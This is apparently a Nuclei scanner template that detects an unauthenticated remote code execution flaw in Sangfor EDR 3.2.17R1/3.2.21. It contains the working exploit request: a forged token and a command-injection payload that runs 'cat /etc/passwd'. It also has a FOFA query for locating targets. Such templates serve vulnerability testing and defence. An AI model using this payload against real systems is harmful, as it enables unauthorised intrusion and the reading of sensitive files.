id: sangfor-edr-rce info: name: Sangfor EDR 3.2.17R1/3.2.21 - Remote Code Execution author: pikpikcu severity: critical description: Sangfor EDR 3.2.17R1/3.2.21 allows remote unauthenticated users to to execute arbitrary commands. reference: - https://www.cnblogs.com/0day-li/p/13650452.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 metadata: fofa-query: app="sangfor" tags: rce,sangfor requests: - method: POST path: - "{{BaseURL}}/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9" headers: Content-Type: application/x-www-form-urlencoded body: | {"params":"w=123\"'1234123'\"|cat /etc/passwd"} matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/05/31